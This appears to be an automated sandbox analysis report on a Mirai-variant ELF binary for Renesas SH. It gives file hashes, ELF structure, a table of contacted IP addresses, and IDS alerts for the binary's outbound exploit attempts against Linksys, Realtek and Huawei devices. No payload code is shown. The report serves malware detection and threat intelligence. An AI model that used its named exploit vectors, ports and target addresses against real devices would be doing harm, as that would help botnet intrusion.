184.95.99.59	unknown	United States	3663	NETNET-NETUS	false
172.51.68.27	unknown	United States	21928	T-MOBILE-AS21928US	false
41.73.250.179	unknown	Nigeria	16284	UNSPECIFIEDNG	false
85.23.76.215	unknown	Finland	16086	DNAFI	false
94.232.145.11	unknown	Poland	39893	NETSYSTEM_TP-ASNPL	false
172.79.94.184	unknown	United States	5650	FRONTIER-FRTRUS	false
172.218.17.210	unknown	Canada	852	ASN852CA	false
212.243.179.17	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
184.230.31.23	unknown	United States	10507	SPCSUS	false
184.113.29.148	unknown	United States	7922	COMCAST-7922US	false
98.205.127.218	unknown	United States	7922	COMCAST-7922US	false
197.173.155.50	unknown	South Africa	37168	CELL-CZA	false
172.253.94.179	unknown	United States	15169	GOOGLEUS	false
197.4.200.44	unknown	Tunisia	5438	ATI-TN	false
172.26.88.61	unknown	Reserved	7018	ATT-INTERNET4US	false
172.220.122.186	unknown	United States	20115	CHARTER-20115US	false
94.216.58.59	unknown	Germany	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
98.202.3.68	unknown	United States	7922	COMCAST-7922US	false
98.225.28.215	unknown	United States	7922	COMCAST-7922US	false
95.166.18.141	unknown	Denmark	3292	TDCTDCASDK	false
94.11.230.114	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
94.107.224.33	unknown	Belgium	47377	ORANGE_BELGIUM_SAKPNBelgiumBusinessNVhasbeenacquired	false
98.34.189.120	unknown	United States	7922	COMCAST-7922US	false
31.162.185.164	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
95.7.215.198	unknown	Turkey	9121	TTNETTR	false
156.100.80.131	unknown	United States	393504	XNSTGCA	false
184.62.170.1	unknown	United States	7155	VIASAT-SP-BACKBONEUS	false
109.26.225.29	unknown	France	15557	LDCOMNETFR	false
85.146.193.143	unknown	Netherlands	33915	TNF-ASNL	false
62.191.178.98	unknown	United Kingdom	5586	MCI-INTGB	false
85.191.178.5	unknown	Denmark	43557	ASEMNETDK	false
95.50.145.219	unknown	Poland	5617	TPNETPL	false
197.55.123.233	unknown	Egypt	8452	TE-ASTE-ASEG	false
62.198.53.80	unknown	Denmark	3308	TELIANET-DENMARKDK	false
98.10.234.54	unknown	United States	11351	TWC-11351-NORTHEASTUS	false
94.26.43.145	unknown	Bulgaria	48452	TRAFFIC-NETBG	false
112.13.87.40	unknown	China	56041	CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationC	false
85.127.123.136	unknown	Austria	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
98.69.167.88	unknown	United States	7018	ATT-INTERNET4US	false
85.4.129.135	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
85.51.224.159	unknown	Spain	12479	UNI2-ASES	false
95.20.61.44	unknown	Spain	12479	UNI2-ASES	false
62.215.147.79	unknown	Kuwait	21050	FAST-TELCOKW	false
85.172.132.99	unknown	Russian Federation	42362	ALANIA-ASBranchformerSevosetinelectrosvyazRU	false
197.235.33.27	unknown	Mozambique	37223	VODACOM-MZ	false
197.255.83.82	unknown	Ghana	37074	UG-ASGH	false
178.81.153.50	unknown	Saudi Arabia	35819	MOBILY-ASEtihadEtisalatCompanyMobilySA	false
31.136.125.87	unknown	Netherlands	15480	VFNL-ASVodafoneNLAutonomousSystemNL	false
156.154.241.47	unknown	United States	19905	NEUSTAR-AS6US	false
31.133.168.246	unknown	Switzerland	51290	HOSTEAM-ASPL	false
85.202.224.221	unknown	Russian Federation	44622	MTK-MOSINTER-ASRU	false
157.2.30.68	unknown	Japan	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
184.163.140.255	unknown	Canada	5769	VIDEOTRONCA	false
197.173.180.15	unknown	South Africa	37168	CELL-CZA	false
42.178.65.127	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
109.207.189.141	unknown	Russian Federation	47438	PSKOVLINE-ASRU	false
98.39.201.89	unknown	United States	7922	COMCAST-7922US	false
184.14.83.41	unknown	United States	7011	FRONTIER-AND-CITIZENSUS	false
156.114.21.53	unknown	Netherlands	13639	ING-AMERICAS-WHOLESALEUS	false
98.137.186.200	unknown	United States	36647	YAHOO-GQ1US	false
197.202.209.187	unknown	Algeria	36947	ALGTEL-ASDZ	false
197.193.232.157	unknown	Egypt	36992	ETISALAT-MISREG	false
109.248.243.51	unknown	Russian Federation	197577	KOMTELECOM-ASRU	false
172.55.148.95	unknown	United States	21928	T-MOBILE-AS21928US	false
197.19.253.163	unknown	Tunisia	37693	TUNISIANATN	false
85.209.47.122	unknown	Ukraine	209825	IBNETUA	false
95.20.61.38	unknown	Spain	12479	UNI2-ASES	false
85.51.224.163	unknown	Spain	12479	UNI2-ASES	false
85.168.96.54	unknown	France	21502	ASN-NUMERICABLEFR	false
98.176.149.100	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
62.245.191.242	unknown	Germany	8767	MNET-ASGermanyDE	false
95.64.90.42	unknown	Iran (ISLAMIC Republic Of)	197207	MCCI-ASIR	false
172.15.61.182	unknown	United States	7018	ATT-INTERNET4US	false
62.168.37.163	unknown	Czech Republic	5588	GTSCEGTSCentralEuropeAntelGermanyCZ	false
41.143.104.71	unknown	Morocco	36903	MT-MPLSMA	false
85.83.182.153	unknown	Denmark	9158	TELENOR_DANMARK_ASDK	false
172.7.46.170	unknown	United States	7018	ATT-INTERNET4US	false
62.186.135.103	unknown	European Union	34456	RIALCOM-ASRU	false
184.201.145.8	unknown	United States	10507	SPCSUS	false
95.153.235.115	unknown	Russian Federation	29497	KUBANGSMRU	false
85.4.129.193	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
94.130.40.201	unknown	Germany	24940	HETZNER-ASDE	false
172.128.97.12	unknown	United States	7018	ATT-INTERNET4US	false
95.158.119.99	unknown	Poland	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
85.90.80.15	unknown	Netherlands	1126	VANCISVancisAdvancedICTServicesEU	false
94.16.9.71	unknown	Germany	42360	SSP-EUROPEpoweredbyANXDE	false
172.63.1.67	unknown	United States	393494	L3TV-ASUS	false
197.233.177.252	unknown	Namibia	36999	TELECOM-NAMIBIANA	false
184.207.168.110	unknown	United States	10507	SPCSUS	false
62.244.130.118	unknown	Poland	12741	AS-NETIAWarszawa02-822PL	false
172.12.118.89	unknown	United States	7018	ATT-INTERNET4US	false
172.3.178.68	unknown	United States	7018	ATT-INTERNET4US	false
85.2.39.248	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
197.49.55.242	unknown	Egypt	8452	TE-ASTE-ASEG	false
85.66.185.79	unknown	Hungary	20845	DIGICABLEHU	false
85.149.115.28	unknown	Netherlands	5390	EURONETNL	false
95.94.139.45	unknown	Portugal	2860	NOS_COMUNICACOESPT	false

File type:	ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.716945146377244
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	qJlf2SjoW4
File size:	74400
MD5:	e584f83cd9c878432f7b464ffd70b162
SHA1:	1f8ff3ba2051f76fc89641dfba00af74e15ad72a
SHA256:	b588d161f6930e582cfd72687ac7d9cf3e1a4884c49a2ca61163d40b2228d491
SHA512:	c254c04e8f10bf7bbbdabed1900e09ee129ecc0e7543fdd00007e9cfe095e3b94d28cc1999df53ad8fa52a0ca7e8d246bcfd5de7d1c2ee8184a90e8f9c15b0fd
SSDEEP:	768:CPcwxFCgVBIis7dqf3eGhq9/xm526zCwv1OHgMf+h31y09nb8RHopHxXD2DSloLj:CPZFfVebUS9NCCNmhH9+opHOiedgU
TLSH:	2673AF61F464AC60C9021AB574F8C87D8343ED9560963CB2EECD8C98C86BF9DF14EB65
File Content Preview:	.ELF.....................@.4....!......4. ...(...............@...@.<...<...............t ..t B.t B.\...d...........Q.td..............................././"O.n......#.@........#.*@l...&O.n.l..................................././.../.a"O.!...n...a.b("...q.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	<unknown>
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4001a0
Flags:	0xc
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	74000
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x2e	0x0	0x6	AX	4
.text	PROGBITS	0x4000e0	0xe0	0x10580	0x0	0x6	AX	32
.fini	PROGBITS	0x410660	0x10660	0x22	0x0	0x6	AX	4
.rodata	PROGBITS	0x410684	0x10684	0x14b8	0x0	0x2	A	4
.ctors	PROGBITS	0x422074	0x12074	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x42207c	0x1207c	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x422088	0x12088	0x48	0x0	0x3	WA	4
.bss	NOBITS	0x4220d0	0x120d0	0xa08	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x120d0	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x11b3c	0x11b3c	4.6261	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x12074	0x422074	0x422074	0x5c	0xa64	1.3730	0x6	RW	0x10000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.2395.58.74.1040992802027121 05/14/22-02:12:12.430631	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	40992	80	192.168.2.23	95.58.74.10
192.168.2.23112.199.99.10646420802027121 05/14/22-02:11:57.622916	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	46420	80	192.168.2.23	112.199.99.106
192.168.2.2395.168.221.10733586802027121 05/14/22-02:12:03.534733	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	33586	80	192.168.2.23	95.168.221.107
192.168.2.2388.166.177.10143818802027121 05/14/22-02:13:00.629220	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	43818	80	192.168.2.23	88.166.177.101
192.168.2.2395.100.34.12649972802027121 05/14/22-02:12:08.603488	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	49972	80	192.168.2.23	95.100.34.126
192.168.2.2395.100.94.17943008802027121 05/14/22-02:12:47.773346	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	43008	80	192.168.2.23	95.100.94.179
192.168.2.2395.97.118.8352268802027121 05/14/22-02:13:23.496514	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	52268	80	192.168.2.23	95.97.118.83
192.168.2.2395.217.218.15945052802027121 05/14/22-02:12:01.397227	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	45052	80	192.168.2.23	95.217.218.159
192.168.2.2395.216.95.11347718802027121 05/14/22-02:11:52.570414	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	47718	80	192.168.2.23	95.216.95.113
192.168.2.23172.81.184.18459202555552027153 05/14/22-02:13:37.089436	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	59202	55555	192.168.2.23	172.81.184.184
192.168.2.23156.226.67.16341018528692027339 05/14/22-02:12:09.245036	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	41018	52869	192.168.2.23	156.226.67.163
192.168.2.2395.78.119.7247502802027121 05/14/22-02:11:52.607486	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	47502	80	192.168.2.23	95.78.119.72
192.168.2.2395.100.118.20437132802027121 05/14/22-02:11:52.802504	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	37132	80	192.168.2.23	95.100.118.204
192.168.2.2395.58.76.9256110802027121 05/14/22-02:12:10.137372	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	56110	80	192.168.2.23	95.58.76.92
192.168.2.2395.100.32.17844078802027121 05/14/22-02:12:38.576645	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44078	80	192.168.2.23	95.100.32.178
192.168.2.23172.245.91.21846486555552027153 05/14/22-02:11:53.481665	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	46486	55555	192.168.2.23	172.245.91.218
192.168.2.2395.101.211.18138602802027121 05/14/22-02:11:46.055471	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38602	80	192.168.2.23	95.101.211.181
192.168.2.23156.250.7.20843406528692027339 05/14/22-02:12:44.093160	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	43406	52869	192.168.2.23	156.250.7.208
192.168.2.2395.211.199.20060430802027121 05/14/22-02:11:50.384445	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	60430	80	192.168.2.23	95.211.199.200
192.168.2.23156.240.107.7347070528692027339 05/14/22-02:12:25.163577	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	47070	52869	192.168.2.23	156.240.107.73
192.168.2.23172.65.182.21341474555552027153 05/14/22-02:12:39.507650	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	41474	55555	192.168.2.23	172.65.182.213
192.168.2.23156.244.105.5134840528692027339 05/14/22-02:13:21.351383	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	34840	52869	192.168.2.23	156.244.105.51
192.168.2.2395.101.243.19935434802027121 05/14/22-02:12:04.777246	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	35434	80	192.168.2.23	95.101.243.199
192.168.2.23172.245.250.17236862555552027153 05/14/22-02:12:19.660814	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	36862	55555	192.168.2.23	172.245.250.172
192.168.2.2395.211.226.13853290802027121 05/14/22-02:11:52.555956	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	53290	80	192.168.2.23	95.211.226.138
192.168.2.2395.43.238.15338478802027121 05/14/22-02:12:01.401310	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38478	80	192.168.2.23	95.43.238.153
192.168.2.23172.65.37.25050424555552027153 05/14/22-02:12:56.874950	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	50424	55555	192.168.2.23	172.65.37.250
192.168.2.2395.213.204.3958836802027121 05/14/22-02:12:23.962062	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	58836	80	192.168.2.23	95.213.204.39
192.168.2.2395.181.133.20233726802027121 05/14/22-02:12:16.233664	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	33726	80	192.168.2.23	95.181.133.202
192.168.2.2395.57.130.22852484802027121 05/14/22-02:12:28.116329	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	52484	80	192.168.2.23	95.57.130.228
192.168.2.2395.216.222.1047996802027121 05/14/22-02:12:06.989256	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	47996	80	192.168.2.23	95.216.222.10
192.168.2.2388.122.230.16741686802027121 05/14/22-02:13:08.893196	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41686	80	192.168.2.23	88.122.230.167
192.168.2.2388.150.159.10657996802027121 05/14/22-02:12:39.841136	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	57996	80	192.168.2.23	88.150.159.106
192.168.2.23156.235.111.19833534528692027339 05/14/22-02:13:20.938260	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	33534	52869	192.168.2.23	156.235.111.198
192.168.2.23172.65.24.9855186555552027153 05/14/22-02:12:20.938724	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	55186	55555	192.168.2.23	172.65.24.98
192.168.2.2395.179.134.1036172802027121 05/14/22-02:12:25.912986	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	36172	80	192.168.2.23	95.179.134.10
192.168.2.2395.101.105.3756502802027121 05/14/22-02:12:16.074396	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	56502	80	192.168.2.23	95.101.105.37
192.168.2.2395.164.218.8357352802027121 05/14/22-02:12:33.749896	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	57352	80	192.168.2.23	95.164.218.83
192.168.2.2395.159.26.3544678802027121 05/14/22-02:12:23.922852	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44678	80	192.168.2.23	95.159.26.35
192.168.2.23156.235.96.9045400528692027339 05/14/22-02:12:34.950230	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	45400	52869	192.168.2.23	156.235.96.90
192.168.2.2395.217.206.17745218802027121 05/14/22-02:12:04.810301	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	45218	80	192.168.2.23	95.217.206.177
192.168.2.2388.49.177.24935962802027121 05/14/22-02:13:40.811485	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	35962	80	192.168.2.23	88.49.177.249
192.168.2.2395.131.158.15946656802027121 05/14/22-02:12:31.381907	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	46656	80	192.168.2.23	95.131.158.159
192.168.2.23172.65.201.24153716555552027153 05/14/22-02:12:16.062221	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	53716	55555	192.168.2.23	172.65.201.241
192.168.2.2395.100.82.23444534802027121 05/14/22-02:12:12.340577	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44534	80	192.168.2.23	95.100.82.234
192.168.2.23172.65.118.14737452555552027153 05/14/22-02:11:50.031237	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	37452	55555	192.168.2.23	172.65.118.147
192.168.2.2395.57.134.4659286802027121 05/14/22-02:12:48.996838	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	59286	80	192.168.2.23	95.57.134.46
192.168.2.23172.65.172.4134814555552027153 05/14/22-02:13:11.806884	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	34814	55555	192.168.2.23	172.65.172.41
192.168.2.23172.65.210.22942204555552027153 05/14/22-02:12:18.507816	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	42204	55555	192.168.2.23	172.65.210.229
192.168.2.2395.94.218.4357504802027121 05/14/22-02:11:57.972753	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	57504	80	192.168.2.23	95.94.218.43
192.168.2.2395.154.249.12134130802027121 05/14/22-02:12:45.473782	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	34130	80	192.168.2.23	95.154.249.121
192.168.2.23172.65.128.24559816555552027153 05/14/22-02:13:11.806767	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	59816	55555	192.168.2.23	172.65.128.245
192.168.2.2395.101.96.5152158802027121 05/14/22-02:13:29.557034	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	52158	80	192.168.2.23	95.101.96.51
192.168.2.2388.203.246.6251484802027121 05/14/22-02:12:51.238182	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	51484	80	192.168.2.23	88.203.246.62
192.168.2.2395.90.162.18347524802027121 05/14/22-02:12:04.810631	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	47524	80	192.168.2.23	95.90.162.183
192.168.2.2395.239.27.7847704802027121 05/14/22-02:13:06.625005	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	47704	80	192.168.2.23	95.239.27.78
192.168.2.2395.100.205.7053328802027121 05/14/22-02:12:03.636693	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	53328	80	192.168.2.23	95.100.205.70
192.168.2.23172.65.151.7759744555552027153 05/14/22-02:11:51.219344	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	59744	55555	192.168.2.23	172.65.151.77
192.168.2.2395.100.59.12043352802027121 05/14/22-02:11:45.945989	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	43352	80	192.168.2.23	95.100.59.120
192.168.2.23172.65.153.17343894555552027153 05/14/22-02:13:39.296017	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	43894	55555	192.168.2.23	172.65.153.173
192.168.2.2395.164.217.3256864802027121 05/14/22-02:12:21.706568	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	56864	80	192.168.2.23	95.164.217.32
192.168.2.2395.209.130.24155784802027121 05/14/22-02:12:28.187173	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	55784	80	192.168.2.23	95.209.130.241
192.168.2.2388.210.164.5859344802027121 05/14/22-02:13:46.124204	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	59344	80	192.168.2.23	88.210.164.58
192.168.2.23172.65.250.15159336555552027153 05/14/22-02:13:19.724871	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	59336	55555	192.168.2.23	172.65.250.151
192.168.2.2395.216.165.11859550802027121 05/14/22-02:12:33.730744	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	59550	80	192.168.2.23	95.216.165.118
192.168.2.2395.229.119.8750144802027121 05/14/22-02:12:16.135372	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	50144	80	192.168.2.23	95.229.119.87
192.168.2.2395.174.97.23347994802027121 05/14/22-02:13:32.979753	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	47994	80	192.168.2.23	95.174.97.233
192.168.2.2395.58.79.12560124802027121 05/14/22-02:12:23.981113	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	60124	80	192.168.2.23	95.58.79.125
192.168.2.23172.65.167.20434184555552027153 05/14/22-02:13:44.962414	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	34184	55555	192.168.2.23	172.65.167.204
192.168.2.2395.80.201.23847450802027121 05/14/22-02:12:16.046839	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	47450	80	192.168.2.23	95.80.201.238
192.168.2.2395.159.51.7337054802027121 05/14/22-02:12:08.430878	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	37054	80	192.168.2.23	95.159.51.73
192.168.2.23156.241.123.15756836528692027339 05/14/22-02:12:54.094946	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	56836	52869	192.168.2.23	156.241.123.157
192.168.2.2395.141.200.19460076802027121 05/14/22-02:12:21.758371	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	60076	80	192.168.2.23	95.141.200.194
192.168.2.2395.101.185.5038634802027121 05/14/22-02:12:38.371591	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38634	80	192.168.2.23	95.101.185.50
192.168.2.23156.241.84.24033824528692027339 05/14/22-02:12:28.673321	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	33824	52869	192.168.2.23	156.241.84.240
192.168.2.2395.179.143.20351242802027121 05/14/22-02:12:18.506552	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	51242	80	192.168.2.23	95.179.143.203
192.168.2.2395.0.30.5660942802027121 05/14/22-02:13:00.841883	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	60942	80	192.168.2.23	95.0.30.56
192.168.2.2395.86.72.5855354802027121 05/14/22-02:13:14.880883	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	55354	80	192.168.2.23	95.86.72.58
192.168.2.2395.97.138.22648964802027121 05/14/22-02:12:57.594704	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48964	80	192.168.2.23	95.97.138.226
192.168.2.23172.65.104.20234854555552027153 05/14/22-02:13:36.964682	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	34854	55555	192.168.2.23	172.65.104.202
192.168.2.23172.65.219.16846204555552027153 05/14/22-02:13:08.554661	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	46204	55555	192.168.2.23	172.65.219.168
192.168.2.2388.87.173.19839632802027121 05/14/22-02:13:19.388360	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	39632	80	192.168.2.23	88.87.173.198
192.168.2.23172.81.184.18459304555552027153 05/14/22-02:13:40.473105	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	59304	55555	192.168.2.23	172.81.184.184
192.168.2.2395.77.28.15555294802027121 05/14/22-02:13:20.332969	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	55294	80	192.168.2.23	95.77.28.155
192.168.2.23172.65.254.15633828555552027153 05/14/22-02:12:11.570207	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	33828	55555	192.168.2.23	172.65.254.156
192.168.2.2395.217.158.13150124802027121 05/14/22-02:12:16.061650	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	50124	80	192.168.2.23	95.217.158.131
192.168.2.23172.65.114.9144870555552027153 05/14/22-02:12:34.796192	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	44870	55555	192.168.2.23	172.65.114.91
192.168.2.23184.105.8.21455800555552027153 05/14/22-02:12:52.633661	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	55800	55555	192.168.2.23	184.105.8.214
192.168.2.2395.101.44.24046514802027121 05/14/22-02:12:38.385188	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	46514	80	192.168.2.23	95.101.44.240
192.168.2.2395.47.138.16839922802027121 05/14/22-02:12:47.737611	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	39922	80	192.168.2.23	95.47.138.168
192.168.2.2395.209.147.14345778802027121 05/14/22-02:12:52.880233	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	45778	80	192.168.2.23	95.209.147.143
192.168.2.2395.100.6.16650622802027121 05/14/22-02:12:38.425801	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	50622	80	192.168.2.23	95.100.6.166
192.168.2.23156.247.30.22451048528692027339 05/14/22-02:12:53.901304	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	51048	52869	192.168.2.23	156.247.30.224
192.168.2.2395.101.178.8946468802027121 05/14/22-02:11:57.639904	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	46468	80	192.168.2.23	95.101.178.89
192.168.2.23197.244.233.15040306372152835222 05/14/22-02:11:51.051598	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	40306	37215	192.168.2.23	197.244.233.150
192.168.2.2395.65.107.22051454802027121 05/14/22-02:11:55.090650	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	51454	80	192.168.2.23	95.65.107.220
192.168.2.2395.90.100.20642786802027121 05/14/22-02:13:06.577911	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	42786	80	192.168.2.23	95.90.100.206
192.168.2.2395.250.235.4243474802027121 05/14/22-02:11:52.862391	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	43474	80	192.168.2.23	95.250.235.42
192.168.2.2395.61.201.12438168802027121 05/14/22-02:13:04.224191	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38168	80	192.168.2.23	95.61.201.124
192.168.2.2388.249.225.1853758802027121 05/14/22-02:13:19.402088	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	53758	80	192.168.2.23	88.249.225.18
192.168.2.23172.245.25.10652588555552027153 05/14/22-02:13:19.821621	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	52588	55555	192.168.2.23	172.245.25.106
